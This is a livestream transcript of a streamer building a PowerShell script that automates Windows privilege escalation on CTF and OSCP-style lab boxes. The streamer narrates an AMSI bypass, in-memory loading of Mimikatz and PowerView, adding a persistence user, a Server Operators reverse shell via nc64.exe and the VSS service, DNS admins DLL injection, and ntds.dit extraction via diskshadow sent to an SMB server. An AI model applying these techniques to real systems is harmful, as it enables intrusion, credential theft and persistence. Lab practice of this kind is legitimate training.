So today we're going to be working on a PowerShell script. Now I'm still not good at PowerShell scripting, but I feel like I've gotten a little bit better. So I was able to make a few scripts. So, oh my, the echo, oh my. Oh lordy. Oh, I'm not going to have the camera up today just because a lot of these scripts go pretty far over, so I'm not going to have the camera up or anything like that today. But, so I started working on this guy like a little bit the other day. And then, what's up, sweetheart? Oh, yeah, you can see them outside the fireworks. They're all right. I mean, they're on their, finale. So they're pretty cool. But yeah, we live near what's called American Village, and each weekend. Is it every Sunday?
8 p.m. on Saturday. It's Sunday.
Yeah, it's Sunday. Oh, okay. Yeah, usually on Saturdays, 8 p.m. They shoot off fireworks. But they shot them off today, which is Sunday. So my wife, who is the smartest, most beautiful woman that I know, she's just the kindest. She said they're probably having an event. But I already started with this. So what I have here is it's invoke everything, right? So I already made an invoke everything script. The problem is that it has to be used with, I'm still using my hands and everything too to talk, because she says hello. She already walked back to the bedroom. So she's probably going to lay down and drink her wine to, that's what she has to do, living with me. I would have to do that too if I lived with myself. But, so I already have an invoke everything script. The problem is that invoke everything asks you questions. Now, it's really good if you were able to RDP into it. It's even better if you know the answers to the questions, right? So this is not like the enum-ad.sh script, nothing like that. This is when you're actually on the box itself, right? So you already got into the box, and then to run this guy like right here. The problem is a lot of boxes are WinRM, right? So you can evil WinRM in, and that doesn't actually ask the questions. It doesn't actually, it just gets stuck. The script just hangs, right? So what I'm trying to do is just make a script for WinRM. So you have to invoke everything for when you're already P'd in, and invoke everything is also much more OSCP friendly. It's going to be much more like real engagement friendly, because it asks you, hey, do you want to actually exploit this? This is dangerous. This is this, like DNS admins. If you exploit that on an actual engagement, you're changing their DNS, stuff like that. So it actually asks you, it tells you like, hey, like this is actually dangerous to do. Like Mimikatz creds vault. That's a dangerous /patch is a dangerous command to run. So it actually asks you beforehand. This one's going to be more for boot to root CTF style boxes where, you don't care if you break it, you can just reset it. Not a big deal, whatever. So I have an invoke everything WinRM, right? Now you do have to put in attack attacker IP and then attack L port. It says in the example, like right here, if you run git help, it will also tell you to do this, like right here. It'll tell you the same exact thing. You shouldn't just fire and forget scripts. You should actually read them and know what the hell's going on. But where I was stuck at was I could not get it to tell me that I was an administrator. I finally got it where it's telling me that, hey, you are an actual administrator or you are not. Right now, the person on this box, what we're logged in as, is an administrator. Okay. After that, it goes ahead and just tells you a couple things to start an SMB server on your local machine, because it will try to send invoke winrm.txt back to you. All right. And it's putting all the stuff that's figuring out into there, into invoke winrm.txt. And it pulls some network information, rtac a IP config in case there's more people on the machine, in case there's more machines around, stuff like that. Excuse me. And then it goes ahead and it runs invoke all checks. So it does go out to the internet also. Another thing that my invoke everything one does is it goes back to yourself. So it calls back to the attacker, right? And pulls it from there. So if you don't have powerup.ps1, powerview, invoke Mimikatz, stuff like that, when it calls back to you, it's not going to be able to pull those things off you. This one actually does go out to the internet and pulls them. The big reason why I didn't do the first one like that was because I was on ship, and it would have taken me days just to get all the, all these guys. And then secondly, I couldn't see if it actually worked or not. That's another thing, because I was on ship. So I can't just plug my computer into the ship network and, okay, let's go, guys. That's not how that works. So it does run an AMSI bypass, right? So let me clean this up like a little bit, because it's kind of ugly right now. Let me get these things away from each other. So putting power up into memory. We'll go ahead and we'll do a echo like right here, just so it looks a little bit friendlier. So it puts power up into memory. Now it does put every single thing into memory. It does not put it into, or does not write to the disk. Okay, so every single thing does go into memory, and from there it does everything that it needs to do. Okay, so it will run an AMSI bypass though. So we're gonna get rid of that just in case. That should be fine. Everything. Now the fire department's doing something. They just shut off all those fireworks. Now the fire department's doing something. All right. So it does put those into memory. Runs a user whoami/all. So, and then that's how I was able to do the contains. Does the user running whoami/all actually contain domain admins or administrators? If it does, it echoes that, hey, you're an administrator, right? And it goes ahead and creates a new user for persistence, right? And if not, there's just going to echo, hey, you're not an administrator. And then from there, it's going to go ahead and continue going. Okay. Invoke all checks, I'm probably going to put that at the end just because that one takes a minute and it's running from another script. So it does take a minute and you can get a lot of errors with it, you know, stuff like that. So I'll probably put that at the very end. So we're right about here. What I want to do now is I want to continue kind of doing this like right here because whoami/all, if you never ran that command, actually drops the privilege, right? So we can do impersonate privilege after authentication. We can do that. And it also drops your groups and your SID. Okay. So it actually drops all that stuff like right there. So I should actually do, if you're administrator, put in, so we'll say, all right, host, boom, boom, and then we'll actually continue with this. So if you're administrator, then you can actually have Mimikatz on the box also, let's say. So we'll do an echo, putting invoke Mimikatz .ps1 into memory. Okay. Then we'll go ahead and we'll grab Mimikatz.ps1. So we'll grab it from, like I said, it reaches out to the internet, this one like right here. So if yours does not reach out to the internet, it's not going to be able to do this. If the machine can't reach out to the internet, you're not going to be able to run these guys like right here, just so you know. Okay, then we'll go ahead and we'll throw that into there. All right. I mean, that should be good enough for that. I feel like we should have to do too much else with that, like right there. All right. And then from here, we'll go ahead and we'll continue down here and we'll just say something. We'll grab this guy like right up here. If user contains, we're not going to do domain admins again, obviously. We're going to do something else, right? So we'll come down here and we'll go ahead and we'll run. If user contains, we'll say SE impersonate. We'll do that one next. So actually, let's stick with groups for now. We'll stick with groups. So let's go ahead and actually open up my notes and we'll see what groups I already have, you know. We can attack and everything. So we'll go ahead and we'll do an Active Directory. We'll go into groups and we'll do, let's say, server operator. We'll start with server operator. Let's do that, okay? All right. And we do have outport on there. So if you do actually create a netcat listener, it will call back to that. Okay, or I could make it echo like, hey, like put a netcat listener on this port, which is probably what we're going to do, and then have it sleep for like 10 seconds while it's waiting for that. Might run something like that, or sleep for 30 seconds. Actually, you know what I should do? Is at the very beginning, we should actually have outport and then NC outport, huh? So that you have, we'll say, because if it can also, no, it's not going to download anything from you. So it should just call back to that outport like right there, since nothing's actually be downloaded from you. So we'll go ahead and we'll do a, where am I? Right here. If user contains, we'll say server operators, right? Operators. Right, then we'll do one of those guys like right there. We'll say echo. Actually, I still want, just in case if people want to use it for an RDP session, then they can still use it. And we'll say echo that, and we're just gonna say $user is within server operators group exploiting now, and then we'll do that again. We're gonna say, actually, we're gonna do an echo that. We'll do a sleep 2, so then people can actually have time to read it. And then we're gonna say start NC listener on port, $out port, waiting 10 seconds. Waiting 10 seconds. Okay. Then we'll do a, I kill that. So then we'll sleep 10. So we'll sleep for 10 seconds. So that gives them time to start up a netcat listener on that port right, if they don't already have one. Obviously, once you use it the first time, you could probably get rid of that sleep 10 because you're already going to know to do that. So if you can't wait 10 seconds, got a problem. But okay, so sleep 10, and then we'll go ahead and we will exploit server operator. So let's first look up nc executable on GitHub, I guess. Yep, there we go. Now what I should do is actually use the 64 or 32-bit version, huh? That's what I should do. And that should download the correct one, huh? That would be fancy. So let's go ahead and do a system info up here first. We'll say $system info or system or something like that. We'll put that up here by the rest of this crap. $system equals, someone just, oh, thank you very much, Text01 for the follow. Thanks a lot. It means a lot. Thank you. All right, we'll say, and then we'll just say from here system. So we'll say system info, and we'll put that into invoke when we're on that text. Okay, and then we'll come back down here, and we'll say if user contains that, server operators, boom, boom. Okay, and then we'll say let's see here, because you're gonna be 6486, right? So if I do a system info in here, like right now, if I type in system info, okay, let's see here, should say 64. Yeah, x64 based PC, or it should say x86 based, right? So we're going to want to see if it contains this, like right here, this x64 based, like right here. So we can say if user contains server operators and $system contains x64, that's going to go ahead and run this. There we go. Okay, cool. So we'll do a wget http, or actually let's go ahead and do a make directory first and see Windows temp, and if that directory is already there, then it just won't do anything. It'll just say like directory is already there, and then we will cd, no, yeah, we can cd to see Windows temp, cd to see Windows temp. All right, and then from there we'll go ahead and we'll download the 64 based, right? So we'll do a wget use basic parsing https. Well, let me go ahead and just grab the actual thing now. So we got n64.exe like right here, right? So I want to download this. How am I going to tell it to download that though? Can I just do a wget for this and see what happens? Let's see what happens if I just do a wget for this. Not a valid application for this OS platform. I feel like it just got the actual, yeah, it just got that like right there. So if I were to, how do I actually tell it to download this now? See, how do I tell it to do that? Right click, open like a new tab. Save that thing as it. No, it's not. That one says blob. Okay, cool. Let's try that like right there. Boom. Let's try to do that. Delete nc64.exe and wget that guy like right there. I should have did out file nc64.exe. Let's see if that works. Let's go. Okay, cool. It's now saying unknown socket error, so that's good because it's just saying, hey, you just don't have it. You just didn't put in the right stuff for it. Awesome. Okay, so we can do a wget use basic parsing that like right there. Tap out file will be nc64.exe, right? And then from here, let's go ahead and it'll do the rest of the thing for our service operator. We're probably just going to run it against VSS. So, and I wonder if sc.exe can actually work on Okay, Ken. You know, some things work on, what is it? Actually, we can do some things work on command prompt that don't work on PowerShell. Well, they all work on PowerShell, so they're harder to put in. We do a services, and we'll put that into invoke winteron.text, right? Then we'll go ahead and we'll throw that in there, okay? And the bin path is going to be C Windows temp, right? nc64.exe attack command.exe. That's going to be going to $attacker IP, and then that's going to be going to $out port, right? Okay, so that should run that. And then from here, we're going to go ahead and now another problem is I can't actually test all these. I mean, I could turn on server operator, I could do all this, but I can't test them all in this box. So I'm just kind of going off my notes, and that should work. And all this just should work. Stop tax service VSS. Start tax service VSS. And what I should say is right now I should have a little. We'll do a right host. All we're going to say is just a little downloading nc64.exe nc64.exe into C Windows temp, and then down here we'll say stopping VSS service, or we'll say restarting VSS service. Restarting VSS service. Check netcat listener. Check netcat listener to see if you get a call back. Okay, cool. So there's that, right? So we'll say if user contains. Now we'll say we'll delete this. And then we'll do a else, and then we'll say if it doesn't contain this, or how is it? And is it else if or is it elif? That doesn't have either of them in there. That's good. Okay, it's else if. So we can do that. Those are just some of the other ones that I wrote. Else if, and then we'll copy that into there. Nope, not that. So we'll go ahead and we'll do an else if. We'll say user contains server operators. And then we'll say it's an x86. Then we'll download the 32-bit, right? x86. That guy like right there. And we'll do the same exact thing, except for this time we're just going to download the 32-bit version. Okay, so we'll say users within server operators group exploit now. Okay, boom, boom. And right here is where we want to actually change it up, right? So we'll go back to the site over here, exit out of here, back, and we just want to go to NC64, right click, open, make a new tab, grab that one like right there, and we'll go ahead and we'll throw this into here under the HTTPS part. There we go. Okay, so, and then instead of NC64, we're just going to do an nc.exe, right? And we want to save it as nc.exe also, right? So tech out file is going to be nc.exe. And remember, we're still nc Windows temp, right? Boom, boom. So that should be good. Else, we'll do this like right here because you don't need to know. It doesn't really matter. Okay, so that should be server operator should now be done. Next thing we want to do is DNS admins. Sounds good. Problem with DNS admins is that it has to actually call back to you. See this? Well, I guess the L port would still be the same, huh? L port would be the same no matter what, wouldn't it? No, because it's calling back to you, but then it's going to. Well, I guess once you download it, you could stop and then start up a netcat listener, huh? On that same L port. We're just going to tell them to do that. Okay. So we'll just do that like right there. We'll say if this, but this time it's going to be for DNS admins. If user contains server operators, if user contains DNS, what is it, DNS admins? Who am I / all? Does this one even contain that? Probably not. Domain admins, yeah, I need DNS. Let's go ahead and do a net groups. DNS update proxy, or actually, you know, is it down here? No. Net groups / domain. Key admins, schema admins. I might just not have a DNS admin in here, huh? I feel like there's most likely to be a space between them. Let's go ahead and look it up like real quick, just to make sure. He has no space. Okay, so DNS admins is all one word. So we'll go ahead and we'll do a DNS admins, and system contains, that doesn't really matter with the and sign. So if user does that, actually before I even run this like right here, then we'll say else. We're just going to save that like real quick, and we're going to go ahead and run it just to make sure that everything so far looks good. So we'll re-get it for myself over here. We'll IEXIWR, put it in the memory, and we'll go ahead and we'll run the actual command itself. Make sure that everything is working good so far. See if users with administrators group. Obviously they are. Putting in term boom is not recognized as a commandlet. Oh, probably because I gotta do like a wget or something, huh? Not just tell it to do that. Okay, so far everything's running fine. This is all just from power up. That's all that is, like right there. So, but this up here did not run fine. Now did it the Mimikatz one? Probably because I just can't type that. We have to actually do something. Use basic parsing. Boom. There we go. Okay, cool. Now that's good. Okay. Since I'm not in server operators group or DNS admins group, the rest of that stuff isn't going to work. Let me try something real quick. Now user, so caret was made. That's good. And should have a password for it also. So that's awesome, like right there. Awesome. So I'm really happy about that. So that works so far. All right. Let's continue on. So let's say if user contains DNS admins, then we're going to go ahead and we're going to run some stuff, right? So we're going to go ahead and we're going to do a little echo again. Or write host, I mean. Boom, boom, boom. User is within DNS admins group. Exploiting now. Make MSF Venom file with the following. Then we'll just go ahead and we'll just copy this like right here. It's obviously not going to be the exact same thing. And we should actually see if it's actually x64 or not again, shouldn't we? So we should actually do that little thing up there again too. All host is going to be $attacker IP. All port is going to be $all port. All right. And we'll go ahead and before that, we'll actually see if user contains DNS admins, attack and we're going to have to do the same thing. System contains x64. Contains x64. I should actually have it. do if it doesn't contain that also, like not server. No, that nobody cares if they're not in the group, huh? So if user contains that and contains x64, then we're gonna run this, right? Okay. Whoopsie daisy, messed that up, huh? I actually want to do like a sleep 5 or something like that. Sleep for 5 seconds. And then we'll say, yeah, we'll do an echo there just in case. We'll say start web server on port 80. Okay. We'll say example Python 3 attack-ng http.server. Okay. Do something like that, like right there. And then we can go ahead and do a wget sleep for another 10 seconds. Echo that. We don't need to echo anything. Yep, we'll do an echo of that. Downloading. Server plugin DLL now. So it should be easy copy and paste stuff like right there. From attacker IP. And then we'll go ahead and we will do a wget http. Do I have to put this in a certain folder? I don't believe I do. Yeah, I believe that was /config server level plugin. Yeah, okay, I can put it wherever I want. So we can do a cd, we can make a directory again. So we'll say a make directory, c Windows temp, cd into there. You know what? Actually, if it cd's into there and this doesn't actually work, then that invoke everything will not be in there, will it? So let's not actually cd into it, huh? We're just gonna say out file, and we're gonna say c Windows temp, because if it goes at the end, it's gonna try to pull the invoke winrm.txt file. It's gonna try to pull that and send it back to Kali machine through an SMB server. Now, if it's in since C Windows temp, obviously you can't do that, right? So we don't want to actually do that. We want to stay in the folder that's already in. So we'll say, hey, okay, that's all good, like right there. That's already going full and everything like that. That's good. Okay. Makes directory. Servers get put in the evil or invoke winrm.txt. W gets it, puts it into there. Echo that. Okay. Downloading netcat64. Let's see Windows temp. Okay, now that looks good now. Okay. So we can do a wget http, or actually whenever it downloads it, do I actually tell it to download there? Yes, okay, I do. Even though it already did it. I'm going to control X this guy. Put him up there. Okay, there we go. Alright, cool. Now we can do an invoke or a wget http $attacker IP / $outport. Attack out file will be C Windows temp / forget what that server level plugin or whatever it is, right? .dll. Copy that. Throw that over into here. Server level plugin .dll. And we may want to do a use basic parsing just in case. And we're going to say, we're going to echo, okay, it already says that's echo, never mind for downloading it. Server level plugin.dll. Alright, cool. Made that directory, and then we're going to go ahead and we are going to call for it, right? Put this like right here. /config server level plugin DLL, and it's going to say to find it in C Windows temp And we'll go ahead and we'll say echo, or not echo, excuse me. We can echo. So there's a space there, then we'll write host, because these colors won't actually show up. Morning, Samuel Hogg, how you doing? So we'll do this, and then we're going to say start netcat listener on port $L port, right? And from here, we're going to go ahead and do a sleep 10 again. Sleeping for 10 seconds. Waiting 10 seconds. Okay. So that should give you plenty of time to do that. Now I'll even put a little example in here. We'll say netcat tech LVMP $L port. There. Now you just copy and paste. You can run DNS command, boom, boom, and from there we should have a callback. I'll obviously be using this on boxes, and just like the other one I did, if there is a problem, we'll obviously be changing it as we're going through it. Okay, else if. Let's go ahead and run this one. And this one will be for x86, right? So we're going to say if it contains x86, then it's going to go ahead. Nope. Else if I want all that right up here. There we go. Okay. So else if usually contains DNS admins and contains x86, we're going to pretty much do the same exact thing, except for this time we're just going to run the Metasploit. Command's going to be different. It's not going to be x64. It's going to be nothing. There we go. And we're good with that. So that was easy, right? Easy day. And then else doesn't matter. So we just say else that. There we go. Cool. Alright, so now I should be able to automatically exploit DNS admins. Let's continue. So we have that and that, right? Let's look at should we do backup operators? Try writing this whole thing in there. We could try. Let's go ahead and try it. We'll do backup operators. SE backup privilege. That's what it's looking for. SE backup privilege. So let's go ahead and do that one. So let's go ahead and say SE backup privilege. Now, one thing with Windows that shouldn't actually matter if it's capital, lowercase, all that crap shouldn't actually matter. But let's go ahead and do a little quick, let's go ahead and look at this site like real quick. Just to see, to make our script look nice. Just like that, okay. We don't need the and contains for this one. I don't believe. We'll find out here in a second. Alright. So if it contains SE backup privilege, now I already have a script for this, so I might just grab that script because that one works, and it took me a couple times to actually get this thing to actually work. So we'll go over into my GitHub. I'll be able to invoke everything, and I already have a backup operator script in here. But this one again asks questions, so we gotta get rid of all the questions, right? Okay, so we want all this. Okay. Okay. All of that is just going to be straight up in the file they're already using. And we do actually want to do a write host. And we're just going to say $user has SE backup privilege. exploiting now. Okay, and we'll go ahead and we'll throw that into invoke window.rm.text. Alright, so hopefully this like right here can also be exploited. We'll save that like right there and go back to my script. Running disk shadow. Yes, this thing actually runs disk shadow after that. Okay. From there, we then do a disk shadow, running robocopy, write host, spread save, so saving everything, and then ask for confirmation. We don't want it. Okay. But what we do want to make sure is that everything else is running, right? So we go ahead and do this. Okay. And from here, we actually don't need to see Windows temp. We're just going to do reg save system.back, right? We're not going to put in C Windows temp. We're going to put it right where we are at that time. We'll copy that to nts.dit, right host, saving, okay. And then copying, what does it save? Oh. Wait. What's going on my script over here? So it's saving that. Copies NTS to here, NTS. Okay, because it's robocopied. Okay, from the E drive into right back to like where it was because it was already in the CD Windows temp. That's why. Okay, never mind. Okay, so reg save system.back. Copying that. Please ensure you have SMB server running. And we're gonna do the same thing again. We're gonna do an echo that. Then we're just gonna say this guy right here again. And we're just going to say start SMB server with following, waiting 10 seconds, SMB server.py period share tech SMB to support. We want to throw it like this. There we go. So now if we have that, that's telling you to start an SMB server on your local machine. Start SMB server on local machine. To attacker IP. I mean, if they can't figure that one out, then probably shouldn't just be running this, okay? Echo or sleep 10. What we got going on over here? Okay, we'll sleep for 10 seconds again, and then we'll go ahead and it'll try to copy it over, right? So we want to copy these two over. Alright. And obviously it's not going to be from C Windows temp. It's going to be from right where they did it at in the beginning. That. And that. Whoops. That, okay. Then we're going to say right host on local machine or on attacker IP run command, and then it's got to run the following command, right? secrets.py, boom. Now am I actually going to do system or system.back? System.back. Okay, and that should now, if the user contains SE backup privilege, that should now work. So SMB server with the following. Okay, cool. Attacker IP /share, attacker IP /share. All right, cool. All right, next we want to do, I'm thinking impersonate privilege. Let's go ahead and make sure that all this works so far, that we're not getting any errors, anything crazy happening. We put on the machine. Oh, see, we're getting an error. Okay, so something happened somewhere. Must provide value expression following the AND operator. Okay, I guess I probably only need one contains, huh? because we're already saying it contains that, so it's probably only need one contains, huh? Oh, it should be and $system contains, right? That's where I mess it up at. So it should be and $system contains x86. Okay, so that looks good so far, like right there, I think. Let's try to download it again. Okay, still getting a problem here. So attack IP over. What? String is missing a terminator. Okay, someone's missing. Yes, they are. There we go. See if that works, like right there. Okay, cool. We got it. We did it. Yay. Let's see what happens here. Okay, doesn't have anything else on there like right now, so yeah, I mean it worked correctly so far because it doesn't have. Wait, does he have backup operators? We'll see if he has backup operators. If he does not, then everything's working correctly so far. If he does have backup operators, then well, we're fucked. Yeah, I don't know what to do. We're just gonna throw it away. Yeah. $9.26. Okay. I'll plan on working on this guy forever, that's all. Who am I / all. We'll see. Does he have backup operators on here? Backup privilege. Okay, so he has backup privilege, but isn't that what I put in there? Backup privilege? So if user contains SE backup privilege, then it should run this guy right here. Did it tell me that I had SE backup privilege? Okay, I'm going to get rid of the invoke all checks for now. So we're going to get rid of this like real quick. We're going to get rid of that like real quick and we're going to run it again. Because before it actually said users with administrators group, but it's not saying that anymore. So it's not actually telling me, hey, that I am part of that now, is it? SE backup privilege, and he does have SE backup privilege now, doesn't he? SE backup privilege. Huh. Wonder why it's not telling me, because if I do a user, I go up to user up here, he's doing who am I / all, right? It's also no longer telling me that I'm a domain admin, and it was doing that before. It was echoing as an admin. I wonder why it's not doing that anymore. See if users within administrators group, but it's not actually saying administrators within administrators group. Now is it? They create a new user. Put that in the memory. Cool. Okay, see if user is within administrators group, but it's not echoing as an admin. Let's go ahead and type out invoke winner of that text. Oh, because I'm on it's like, why is the tab working? Because I'm on WinRM. Okay. User claims unknown. Administrator, administrators. So it should be right around here somewhere. It should say user within administrator group, but it does not. Now does it? Huh. That's very, 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 very strange. But he's right here with it now, isn't he? Why isn't it telling me that I belong to it anymore? If user contains domain admins or administrators, then run this. He's running it, like he's doing that part of it. You know what I'm saying? But he's not saying that he is an admin. He's not doing that part like right there. Why are you not doing that? Let's do a write host, I guess. Let's try that. You never know. Is echo afterwards that's messing it up now? Okay, so we at least have is an admin now. Okay, cool. He already exists. Okay, so at least we have that now, right? The problem now is that we're not running the other stuff. Server operators. It's not running the DNS admins. If user contains DNS admins and system contains x64, which system should contain x64. Let's go ahead and just do just the system one. Let's go up top, and we'll just say if it's an x64 or x86 system all the way up top, right? So we'll say we'll do it after all this crap. Okay. So we'll say we'll actually do it after the administrators group because that's a little more important information, like right there. We'll put it right here. There we go. Okay. If $ system contains x64, then we'll go ahead and we'll do a machine is 64-bit. Let's go. What's up, Sharma? How you doing? Machine is 64-bit. Let's go ahead and it does that. Else if system contains x86, we'll just do a write host system is 32-bit. We'll do an else, and nobody knows what the hell's going on. System is Linux. Alright, let's go ahead and try to run that, see if that does anything. Okay, what'd I do? Did I miss something there? I obviously missed something here. Must provide value expression for the, yeah, contains x64. Maybe I should get rid of the x. Maybe it's getting confused by that. You know what it is? I know exactly what it is. Probably need to put quotation marks around, don't I? Let's try that. Yeah, maybe I should put quotation marks around it next time, huh? Instead of just x64. Can you find that? Okay, he is an admin. Everything we'll put in the invoke when on text. Now we can permit running invoke all checks. So he's still not telling me system info is still not telling me 64 or 32-bit, right? Because that's system info like right there. Now if I type in system info, or let's go ahead and type out .text, I should have system info in here. I should have that. Maybe it's actually just looking for, maybe we have to put this whole thing in there, x64 based. Let's try to do that. Let's try that like right there. Maybe that'll give me something a little bit better here. Oh yeah, I've been gone for a while. Got back not too long ago. What did they put in there? How you doing, Sharma? So it's still not giving me if it's a 64 or 86-bit system. Huh. I wonder if there's another way to be able to do it. Let's see how to do get system type. Let's see if there's something like that for Windows PowerShell. Change the syntax from plain text to PowerShell bottom right corner. Huh? What are you talking about? Oh, over here? Plain text. Oh, wow, look at that. I never even knew that. Thank you very much. I've just been doing it in plain text the whole time. Thank you. Plain text. I've never seen that. Plain text is PowerShell. There's no PowerShell in here. Looks like that's what we get. What we get. Or if there's like an extension for it. Sublime PowerShell extension. So we could always let's try to find it. See if Sublime Text has a PowerShell extension. I think we gotta install a PowerShell package. See, nobody. Control-Shift-P. Guys do that? Is that like a thing? Guys type in Control-Shift-P and just download it? PowerShell. Package. What was the package name? Install package control. Package control. PowerShell. Select PowerShell. Install package. Package control install package. Did I do it? Okay. PowerShell. Oh my god. It's doing something. I think it just installed it. So like if we get out of here and go back in, is it gonna be like mind blown. Alright, we are learning crazy amounts of stuff like right now. Alright, let's go back to here. Thank you very much. Get computer info. Command gets a consolidated object of the system and operating system properties. How to get operating system? No, I want to see determine the OS version. No, I don't care about that. I want to see the system version. I don't care about the get OS version. I guess get OS version. I mean, it's not really what I want to see though. Yeah, see, it's gonna say that. There we go. Okay. Boom. So now we can make it like a little bit easier on it, I guess. Let's try that like right there. Let's see if that's a command. Okay. So let's try that command like right there. So we'll do a system will be actually we'll say bit. We'll call it that. Then we'll still do a $ system equals system info. In case we actually need to do that. Bit, we'll put that in. We'll put that in the invoke winrm.text. Okay, cool. And from here, let's go ahead and change all these to bit. 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 Alright, right there we should be good with just those two, and we'll see if the rest of them work. Alright, so let's go ahead and re-download it. Or re-put it back into memory. Let's see if that runs a little better. Well, now it's just 64-bit and not 64 based, huh? So it's not going to be able to find it anyway. So that's still not going to work like right there because it says 64. Is it 64-bit? Is that what it says? Let me see here. Yeah, it says 64-bit. Okay. I wonder if it's going to be 86-bit or 32. Probably 32-bit then, huh? It'll probably be like that. I don't know. I ain't got no fucking 32-bit systems running around here. Okay, is an admin. Still not telling me what it is it? I don't like that right there, that script running part. Just real quick. Okay. Still not telling me what bit it is though now, is it? If bit contains 64-bit, then do this. Machine is 64-bit. Also, if bit contains 32-bit, then it should say system is 32-bit. Right? Now, why is it not seeing that? So it should actually be right up here. Should be like right here. We should just be able to see it. We are not. Why? Maybe it's getting confused with the quotation marks. Maybe it's got to be coded like this, maybe. Let's try that. You never know. PowerShell, you never ever know. So we should see it like right now. Nope, it just says is an admin next. So it should be right here. We should see it. But we do not. Why do we not? Why do you hate me, PowerShell? What if we just bit is 64-bit? What if we just do that? What if it's not contained? What if we just say, hey? Okay, doesn't like that at all. System is 64-bit. Alright, cool, so that worked. So we just got rid of the contains. So now we know if it's 64-bit or 32-bit, right? Cool. So we actually take this whole thing right here. Control X, because it's actually running the administrator one first. There we go. And we'll throw that in there. Okay. Cool. So now we know if it's 32 or 64-bit based system, which means now we can do if user case server operators and system and bit equals 64-bit, right? So we can change all those now. Bit equals 86 or 32-bit. At least I hope it's 32-bit. That's what we're going to go for. So we're going for like right now. There's a much easier way to do this on Sublime Text also than what I'm doing like right now. Still not seeing that though. If it contains SE backup privilege. I wonder if we could do like the text file. Like if that text file, right? If what we were on that text contains that. I don't know if it's going to know what to do with that. It's going to be lost with that. But that's not a command. Yep. They had no idea what to do with that, did you? It's not just a variable or property. I mean, I feel like it's that last one that we just did. I feel like if I actually just Control Z that guy, and we do that, I feel like it'll work now just fine. Nope, it does not. So it doesn't like this and bit equals 64 bit. It doesn't like that at all. So what we should do actually is make a, I guess, check bit, and then we'll make it so architecture boom boom, and we'll put it into like, so if it goes there, right to bit, and then from there, if it's a 64 bit, it can do something else. If bit equals 64 bit, see, it doesn't mind it up here. It minds it though whenever we get this and in there now, doesn't it? You know what I should do is just have them actually put in if it's 64 or 32 up here, shouldn't I? That's what I should do, like right there. That would make our lives about 18 million times easier, but I mean, is that really the way? You know what I'm saying? And it's still actually not even finding this SE backup privilege down here. Or we just say everything's 64-bit. Huh. Let's see here. Attack RP and no port. Bit equals that. Goes into winteron.text. Right. What I want to do is make it so we can call for that guy without equals. So if we say $ bit equals this again, then that'll equal, no, because it's going to be 64 32 bit there. You can't just say that it's going to be 64. I gotta figure out how to make it so if it goes there, then it replaces the name bit with like bit 64. And then I can just do and bit 64. You know what I'm saying? Contains. Can I do that? Are we gonna get rid of, how many errors do we have here like right now? One page. Let's see if that works. Less errors, huh? Because last time it started at 84, now it's starting at 105. So I wonder if we can do the contains. I wonder if that'll work. But we noticed up there that that contains did not work. So that's not going to work right there, is it? Damn, I really was hoping that would work. See, told you I'm not good enough at PowerShell scripting yet. Still more I need to learn, much more. System is 64-bit, cool. But you know what's happening now is it's still not seeing I'm an SE backup privilege, which I am. If user equals maybe. Let's try that. Seems like equal signs. Not contains. Okay. So yes, if user equals that, then it's going to do that. It's cool. Alright, so that means all of these up here. I wonder if I have to do if user equals DNS admin and bit equals, we'll try it like that first. We're just going to save that one. We'll see if that works. Okay, what's this? Okay, so it did actually try to bring it back to me also. Alright, let's actually see if I start up an SMB server, it will actually bring it back to me. Now, just because I'm trying to bring it back to me doesn't mean that it technically will work. The system itself may not allow it to come back to me. It may say like, hey, like it doesn't trust it, things like that. So it may not allow it. Ooh, and we did just save that one, didn't we? Or did we just rerun this guy? I think we just reran it. Is it not able to? Hopefully that works. Because eWindows NCTS doesn't seem to exist. But that's also, did it say that up top? Yeah, it says we can't find a specified path. eWindows NCTS. Hopefully this works like right here. I'd be surprised if it does. Last time at least kept going. This time it's not even going anymore, huh? Just kind of hang out there for system.back. Seems to be stuck. This is the same problem I was actually having last time too with this exact thing. So you know what I might do? Because I already have that script, right? So at least it's finding it now. Okay. It also did not yell at me for saying if user equals. Now did it? It didn't yell at me for that one, like right there. Right here. It didn't yell at me for that. So let's go ahead and try to rerun that, which I gotta scroll up to grab it. What I'm thinking is let's go ahead and actually, let's just rerun it like right now. We're just going to do that just so I have it ready to go. What I'm thinking is let's go ahead and have it call back to the script I already have, and we'll just get rid of the question. No, because it asks questions. If it calls back to there, that's not going to work. See, sometimes it does not like to do this part, like right here. Let's try to run it one more time. Let's actually try to put all this in script.txt. See if it actually, let's actually type script.txt and see if all that went in there. Okay, at least it all went in. Because sometimes it doesn't even all go into there. And that all, yes. Okay, that all looks good like right there. Okay. So let's go ahead and try to run that one more time, and we'll see if it works. See if I at least get something back. So far, it's running everything else okay. So that's good. There's an admin. Okay. System is 64-bit. Okay, so for some reason it's not getting to that eWindows NCTS. It does not exist. What if I can make directory? Name drive with the drive with the name E does not exist. I understand that. but that's how we actually exploit that guy, though. This shadow. Because we're adding volume C to the alias CD drive, or exposing CD drive to E. So let's go ahead and grab that, like right there. Wait, no, that's in that script, huh? Did it ever actually run that script? Yeah, it had to have, because it's telling me that it's not in there. Yeah, it definitely runs that. I don't know what that crap is like right there. It's telling it that it's an alias, but it's not actually doing anything now, is it? Set metadata to see Windows 10 metadata-cab. 1 sec. Begin backup, add volume C alias to CD drive, expose CD drive E. Let's try to do something real quick. I want to try. I don't think this is going to work, but we're going to go ahead and try it. Let's try this. Okay, nope, that wasn't it. See if that worked like right there, but still can't find, obviously, that E drive. Because that E drive doesn't actually exist. So I'm wondering if this is just something with this machine itself. I'm going to have to try this on one of the machines that actually are vulnerable to that, like right there. I'm going to have to try something like that. That's what we're going to have to do, I think. We also have the DLL method. We could try that. Which then imports the modules. So I did is imported them and I was done. I feel like I did more than that. I feel like I probably did that and I was like, yeah, that didn't work. So I went back and did this one like right here. Is that X in there? These X's aren't in there, are they? And you know what? On the other one, I had to get rid of all the X's. On this one, maybe I have to keep them all. I don't know. So let's go ahead and actually do this over again and put an X on the end of everything, huh? So it's going to be set verbose on with an X on the end of it. Save that guy. Let's see what happens there. Yeah, you fucker. Well, it didn't yell at me. Well, it should have yelled at me yet, but still. Still can't find the specified path. Okay, so it's not, doesn't have anything to do with those X's at the end. Okay. I swear in the other one, the X's were giving me problems. So there we go. Huh. I might have to find what's actually vulnerable. This guy might just not allow for that. I don't know. Expose CD drive to E. I want to subscribe like right now. No, I'm just kidding. I want to follow like right now. I'm lost. Thanks a lot for the follow. Pony Lover? Pony Lover? We call you Pony Lover, I guess. Huh, man. Okay. So I think I'll just have to wait on that one to go back to a box that I know is vulnerable to this and run that guy, even though it should work just fine. That exact thing should work. And you know what we're not getting also that I noticed? 